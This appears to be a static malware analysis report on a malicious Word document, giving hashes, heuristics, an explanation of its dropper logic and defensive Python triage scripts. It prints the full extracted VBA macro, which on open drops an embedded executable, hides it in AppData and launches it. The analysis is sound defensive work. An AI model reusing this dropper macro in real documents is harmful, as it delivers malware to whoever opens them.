Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d04079c569863276…

MALICIOUS

Office (OOXML)

Size: 113.7 KB
Created: 2014-11-24 00:16:00 UTC
Authoring application: Microsoft Office Word 15.0000
First seen: 2015-02-05
MD5: 5d8928dc78c56a0409076ed13d22b451
SHA-1: b5bf3ddcf2cec0e245fc46543ff466e3a5928e5a
SHA-256: d04079c569863276bf4a135096b68fbafc6bb2679ac10b41b4af40f30d6fbb12
Risk score: 314

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
T1140 Deobfuscate/Decode Files or Information

The only obfuscation visible in the extracted VBA is the split string literals ("<" & "sel" & "ect>") in the helper subs; Sub h, the path that actually executes, is written in the clear, which matches the "Obfuscation or payload: unlikely" verdict on vbaProject_00.bin below.

The VBA project defines three auto-exec entry points, Auto_Open, AutoOpen and Workbook_Open, which all lead to Sub h (Workbook_Open is an Excel handler and never fires in Word; its presence in a ThisDocument module suggests a macro template reused across Word and Excel). The macro does not download anything. It touches the embedded OLE Package object (Me.Application.ActiveDocument.InlineShapes(1).OLEFormat.Object), which makes the Windows Packager write the package's file, updater.exe, into C:\Users\<username>\AppData\Local\Temp; it then waits two seconds, checks that the file is exactly 168448 bytes (the expected length of the file carried in the 168730-byte Ole10Native stream listed under the artifacts), copies it to C:\Users\<username>\AppData\ntuserssc.exe (directly under AppData, not Local or Roaming, with a name chosen to resemble the ntuser.* files), sets the hidden attribute, launches it with Shell, and deletes the temp copy. Any existing file at either path is removed first, and On Error Resume Next suppresses all failures. This is a dropper whose payload travels inside the document; the ClamAV name Doc.Downloader.Generic is a generic family label, not evidence of a network fetch. The remaining subs (deltags, deltext, addtext) are never called from an entry point; they strip <select>/<inbox> marker text from the document body and recolour a text range, i.e. housekeeping for the lure document.

Heuristics (10)

  • ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • Ole10Native package drops an auto-executable payload critical OFFICE_PACKAGE_RISKY_FILE
    OLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use — it is a malware-delivery dropper.
  • VBA project inside OOXML medium (5 related findings) OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell HGO
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    TMP = "C:\Users\" & Environ("username") & "\AppData\Local\Temp\"
  • Embedded OLE object medium OOXML_OLE_OBJECT
    Document contains an embedded OLE object
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    All 13 URLs below were found in document text (OOXML body / shared strings). They are the standard OOXML and Word XML namespace identifiers carried by any Word 2010+ document, not addresses the macro contacts; nothing in the extracted VBA performs a network request, so none of them is a network indicator.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2012/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape
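The OFFICE_PACKAGE_RISKY_FILE finding above and the macro's FileLen guard both hinge on what is inside the Ole10Native (OLE Package) stream. The following Python is an added example written for this page by the editor, not the scanner's code and not part of the report: it parses a raw Ole10Native stream into its label, original path, temp path and payload, flags any auto-executable extension, and mirrors the macro's size check. The field layout is the commonly documented one (the layout oletools' oleobj reads); AUTO_EXEC_EXTS is the editor's list, not the scanner's; and the sample stream is constructed inline with a 1 KiB stub payload, so its sizes and hash say nothing about the real document.

```python
"""Parse an Ole10Native (OLE Package) stream and flag auto-executable payloads.

Added example by the editor, not code from the report or its scanner. The
field layout follows the commonly documented Ole10Native structure (the one
oletools' oleobj reads). The sample stream is constructed below, so its
sizes and hash are illustrative and do not describe the analysed document.
"""
import hashlib
import ntpath
import struct

# Extensions the Windows shell runs directly on double-click. Assumption: this
# is the editor's list, not the scanner's OFFICE_PACKAGE_RISKY_FILE list.
AUTO_EXEC_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".vbs", ".vbe",
                  ".js", ".jse", ".wsf", ".wsh", ".hta", ".msi", ".lnk"}


def _read_cstr(buf, pos):
    """Read a NUL-terminated ANSI string at pos; return (text, position after the NUL)."""
    end = buf.index(b"\x00", pos)
    return buf[pos:end].decode("latin-1"), end + 1


def build_ole10native(label, filename, temp_path, payload):
    """Serialise a Package stream (used here only to construct test input)."""
    body = struct.pack("<H", 2)                             # flags1, 0x0002 for a Package
    body += label.encode("latin-1") + b"\x00"               # display name shown in the document
    body += filename.encode("latin-1") + b"\x00"            # path on the author's machine
    body += struct.pack("<HHI", 0, 3, len(temp_path) + 1)   # flags2, unknown, temp path length
    body += temp_path.encode("latin-1") + b"\x00"           # path Packager extracts to
    body += struct.pack("<I", len(payload)) + payload       # payload length, then payload
    return struct.pack("<I", len(body)) + body              # leading size of everything after it


def parse_ole10native(stream):
    """Return the header strings and payload of an Ole10Native stream."""
    (total,) = struct.unpack_from("<I", stream, 0)
    if total != len(stream) - 4:
        raise ValueError("size field %d != stream length - 4" % total)
    label, pos = _read_cstr(stream, 6)          # skip 4-byte size + 2-byte flags1
    filename, pos = _read_cstr(stream, pos)
    pos += 8                                    # flags2 (2) + unknown (2) + temp path length (4)
    temp_path, pos = _read_cstr(stream, pos)
    (data_len,) = struct.unpack_from("<I", stream, pos)
    pos += 4
    payload = stream[pos:pos + data_len]
    if len(payload) != data_len:
        raise ValueError("payload truncated: header says %d, have %d" % (data_len, len(payload)))
    return {"label": label, "filename": filename, "temp_path": temp_path,
            "payload": payload, "header_len": pos}


def assess_package(stream):
    """OFFICE_PACKAGE_RISKY_FILE idea: any of the three names ends in an auto-exec extension."""
    pkg = parse_ole10native(stream)
    names = (pkg["label"], pkg["filename"], pkg["temp_path"])
    exts = {ntpath.splitext(n)[1].lower() for n in names}
    return {
        "label": pkg["label"],
        "extension": ntpath.splitext(pkg["label"])[1].lower(),
        "risky": bool(exts & AUTO_EXEC_EXTS),
        "payload_size": len(pkg["payload"]),
        "header_overhead": len(stream) - len(pkg["payload"]),  # what the macro's SS omits
        "sha256": hashlib.sha256(pkg["payload"]).hexdigest(),
    }


def macro_size_guard(stream, expected_size):
    """Mirror the macro's `If (RS = SS)`: is the extracted file exactly the expected length?"""
    return len(parse_ole10native(stream)["payload"]) == expected_size


# Constructed sample: names borrowed from the macro, payload is a 1 KiB stub, not the real binary.
SAMPLE_PAYLOAD = b"MZ" + b"\x90" * 1022
SAMPLE_STREAM = build_ole10native(
    "updater.exe", r"C:\build\updater.exe",
    r"C:\Users\victim\AppData\Local\Temp\updater.exe", SAMPLE_PAYLOAD)

if __name__ == "__main__":
    print(assess_package(SAMPLE_STREAM))
    print("macro size guard passes:", macro_size_guard(SAMPLE_STREAM, len(SAMPLE_PAYLOAD)))
```

On a real document the stream is not a loose file: unzip the .docx, open word/embeddings/oleObject1.bin as an OLE compound file (olefile, or oletools' oleobj which does all of this) and feed the bytes of its Ole10Native stream to parse_ole10native. For this sample the carved stream is 168730 bytes while the macro insists on a 168448-byte file, a 282-byte difference that the header fields and the label and path strings account for; comparing the parsed payload length with the macro's SS constant is a cheap way to confirm that the Package and the VBA belong to the same kit.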

Extracted artifacts (6)

Files carved from inside the sample during analysis.

macros.bas
  Kind: vba-macro
  Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
  Size: 3348 bytes
  SHA-256: ff38bc7e213d0a003b9b243ccf1f293a1d45eab5f4b8aaf7ff16aed90f4f14a7
  Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Auto_Open()
    h
End Sub
Sub h()
On Error Resume Next
Dim HH, HGO, SS, RS, TMP, EX As String
SS = 168448
EX = "updater.exe"
TMP = "C:\Users\" & Environ("username") & "\AppData\Local\Temp\"
HH = TMP + EX
If (Len(Dir(HH)) <> 0) Then
      Kill HH
End If
HGO = "C:\Users\" & Environ("username") & "\AppData\ntuserssc.exe"
If (Len(Dir(HGO)) <> 0) Then
      Kill HGO
End If
Dim fso As Object
Set fso = Me.Application.ActiveDocument.InlineShapes(1).OLEFormat.Object
WaitFor (2)
RS = FileLen(TMP + EX)
If (RS = SS) Then
FileCopy HH, HGO
SetAttr HGO, vbHidden
Shell HGO
End If
Kill HH
End Sub
Sub AutoOpen()
    Auto_Open
End Sub
Sub Workbook_Open()
    Auto_Open
End Sub
Sub WaitFor(NumOfSeconds As Long)
Dim SngSec As Long
SngSec = Timer + NumOfSeconds
Do While Timer < SngSec
DoEvents
Loop
End Sub


Sub deltags()
For Each myStoryRange In ActiveDocument.StoryRanges
    With myStoryRange.Find
        .Text = "<" & "sel" & "ect>"
        .Replacement.Text = " "
        .Wrap = wdFindContinue
        .Execute Replace:=wdReplaceAll
    End With
Next myStoryRange

For Each myStoryRange In ActiveDocument.StoryRanges
    With myStoryRange.Find
        .Text = "</s" & "ele" & "ct>"
        .Replacement.Text = " "
        .Wrap = wdFindContinue
        .Execute Replace:=wdReplaceAll
    End With
Next myStoryRange
    
For Each myStoryRange In ActiveDocument.StoryRanges
    With myStoryRange.Find
        .Text = "<" & "in" & "box>"
        .Replacement.Text = " "
        .Wrap = wdFindContinue
        .Execute Replace:=wdReplaceAll
    End With
Next myStoryRange

For Each myStoryRange In ActiveDocument.StoryRanges
    With myStoryRange.Find
        .Text = "</" & "in" & "box>"
        .Replacement.Text = " "
        .Wrap = wdFindContinue
        .Execute Replace:=wdReplaceAll
    End With
Next myStoryRange
End Sub

Sub deltext()
Dim firstTerm, secondTerm, selectedText As String
Dim myRange, selRange As Range
Set myRange = ActiveDocument.Range
firstTerm = "<se" & "lect>"
secondTerm = "</sel" & "ect>"
With myRange.Find
.Text = firstTerm
.MatchWholeWord = True
.Execute
myRange.Collapse direction:=wdCollapseEnd
Set selRange = ActiveDocument.Range
selRange.Start = myRange.End
.Text = secondTerm
.MatchWholeWord = True
.Execute
myRange.Collapse direction:=wdCollapseStart
selRange.End = myRange.Start
selectedText = selRange.Delete
End With
End Sub
Sub addtext()
Dim firstTerm, secondTerm, selectedTextt As String
Dim myRanget, selRanget As Range
Set myRanget = ActiveDocument.Range
firstTerm = "<in" & "box>"
secondTerm = "</in" & "box>"
With myRanget.Find
.Text = firstTerm
.MatchWholeWord = True
.Execute
myRanget.Collapse direction:=wdCollapseEnd
Set selRanget = ActiveDocument.Range
selRanget.Start = myRanget.End
.Text = secondTerm
.MatchWholeWord = True
.Execute
myRanget.Collapse direction:=wdCollapseStart
selRanget.End = myRanget.Start
selectedTextt = selRanget
selRanget.Font.Color = wdColorBlack
End With
End Sub
ooxml_oleobject_00.bin
  Kind: ooxml-ole-object
  Source: OOXML embedded OLE part: word/embeddings/oleObject1.bin
  Size: 172544 bytes
  SHA-256: 7532f2b1719eec8a23ef15f80667c433f7fada73f56617453c7e9ad8cd825dad
ooxml_oleobject_00_ole10native_00.bin
  Kind: ole-package
  Source: OOXML word/embeddings/oleObject1.bin, Ole10Native stream
  Size: 168730 bytes
  SHA-256: b52ea65a57229e61b357f07a9bbf3b87c96d2aadd0a6f998d8b959855d32676e
vbaProject_00.bin
  Kind: vba-project
  Source: OOXML VBA project: word/vbaProject.bin
  Size: 14336 bytes
  SHA-256: 496e1837f2b52f9048e7541a0333245aab00093c2ee8a00057ebded794f6b8de
  Detection: ClamAV: Doc.Downloader.Generic-6698421-0
  Obfuscation or payload: unlikely
emf_00.emf
  Kind: ooxml-emf
  Source: OOXML EMF part: docProps/thumbnail.emf
  Size: 11812 bytes
  SHA-256: 0504d15c13ea3f825003b3459c8a28a8cdde103f3e83a1b2d426535800e9d0d5
emf_01.emf
  Kind: ooxml-emf
  Source: OOXML EMF part: word/media/image1.emf
  Size: 5440 bytes
  SHA-256: c620974e8f7c527db57bf5e3a1a51da70dba46b5ed1e96fd707e5a214740f7c4
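The OLE_VBA_* heuristics above match keywords anywhere in the module, which is why the unused deltags/deltext/addtext helpers count as findings alongside Sub h. A triage step that a practitioner usually wants next is to tell which procedures are actually reachable from an auto-exec entry point before weighing the keyword hits. The Python below is an added example by the editor, not part of the report, of oletools, or of the scanner: it splits a VBA module into procedures, builds a call graph by bare-identifier reference, walks it from the auto-exec names, and reports suspicious keywords only for the reachable set. AUTO_EXEC_NAMES and SUSPICIOUS are the editor's lists and only approximate the report's heuristics; the input is a trimmed excerpt of the macros.bas preview above, with the unreferenced helpers shortened to a single stub.

```python
"""Reachability triage for a VBA module: which subs run from an auto-exec entry point.

Added example by the editor, not part of the report or of oletools. The keyword
and entry-point lists are the editor's and only approximate the report's
OLE_VBA_* heuristics. SAMPLE_VBA is a trimmed excerpt of the macros.bas above.
"""
import re
from collections import deque

# Procedure names Office runs without user interaction (Word and Excel; the
# Excel ones never fire inside Word but still belong in the list).
AUTO_EXEC_NAMES = {"auto_open", "autoopen", "document_open", "workbook_open",
                   "auto_close", "autoclose", "document_close", "autoexec", "autonew"}

# Keywords in the spirit of the report's heuristics: (label, regex).
SUSPICIOUS = [
    ("shell-exec", re.compile(r"\bShell\b", re.I)),
    ("env-access", re.compile(r"\bEnviron\b", re.I)),
    ("file-copy", re.compile(r"\bFileCopy\b", re.I)),
    ("hide-file", re.compile(r"\bSetAttr\b.*\bvbHidden\b", re.I)),
    ("ole-object-touch", re.compile(r"\.OLEFormat\.(Object|Activate)\b", re.I)),
    ("file-delete", re.compile(r"\bKill\b", re.I)),
]

# One procedure: optional visibility, Sub/Function, name, parameter list, body, End Sub/Function.
PROC_RE = re.compile(
    r"^\s*(?:Public |Private )?(?:Sub|Function)\s+(\w+)\s*\(.*?^\s*End (?:Sub|Function)",
    re.I | re.M | re.S)


def split_procedures(src):
    """Map lower-cased procedure name -> full procedure text."""
    return {m.group(1).lower(): m.group(0) for m in PROC_RE.finditer(src)}


def call_graph(procs):
    """Edges proc -> procs whose name appears as a bare identifier in its body (head line excluded)."""
    graph = {}
    for name, body in procs.items():
        body_no_head = body.split("\n", 1)[1] if "\n" in body else ""
        graph[name] = {other for other in procs if other != name
                       and re.search(r"\b%s\b" % re.escape(other), body_no_head, re.I)}
    return graph


def reachable_from_autoexec(procs):
    """Breadth-first walk from every auto-exec entry point present in the module."""
    graph = call_graph(procs)
    seen, queue = set(), deque(n for n in procs if n in AUTO_EXEC_NAMES)
    while queue:
        cur = queue.popleft()
        if cur in seen:
            continue
        seen.add(cur)
        queue.extend(graph[cur] - seen)
    return seen


def triage(src):
    """Return reachable and dead procedure names plus keyword hits for the reachable ones."""
    procs = split_procedures(src)
    live = reachable_from_autoexec(procs)
    hits = {}
    for name in sorted(live):
        labels = [label for label, rx in SUSPICIOUS if rx.search(procs[name])]
        if labels:
            hits[name] = labels
    return {"reachable": sorted(live), "dead": sorted(set(procs) - live), "hits": hits}


# Trimmed excerpt of the macros.bas shown above; deltags stands in for the unreferenced helpers.
SAMPLE_VBA = r'''
Sub Auto_Open()
    h
End Sub
Sub h()
On Error Resume Next
Dim HH, HGO, SS, RS, TMP, EX As String
SS = 168448
EX = "updater.exe"
TMP = "C:\Users\" & Environ("username") & "\AppData\Local\Temp\"
HH = TMP + EX
HGO = "C:\Users\" & Environ("username") & "\AppData\ntuserssc.exe"
Dim fso As Object
Set fso = Me.Application.ActiveDocument.InlineShapes(1).OLEFormat.Object
WaitFor (2)
RS = FileLen(TMP + EX)
If (RS = SS) Then
FileCopy HH, HGO
SetAttr HGO, vbHidden
Shell HGO
End If
Kill HH
End Sub
Sub AutoOpen()
    Auto_Open
End Sub
Sub Workbook_Open()
    Auto_Open
End Sub
Sub WaitFor(NumOfSeconds As Long)
Dim SngSec As Long
SngSec = Timer + NumOfSeconds
Do While Timer < SngSec
DoEvents
Loop
End Sub
Sub deltags()
For Each myStoryRange In ActiveDocument.StoryRanges
    myStoryRange.Find.Execute Replace:=wdReplaceAll
Next myStoryRange
End Sub
'''

if __name__ == "__main__":
    print(triage(SAMPLE_VBA))
```

Run against the excerpt, the walk reaches Auto_Open, AutoOpen, Workbook_Open, h and WaitFor, leaves deltags dead, and concentrates every keyword hit in h, which is the picture the summary gives. Bare-identifier matching is deliberately crude: it cannot see calls built with CallByName or Application.Run, so treat a dead procedure as lower priority rather than as harmless.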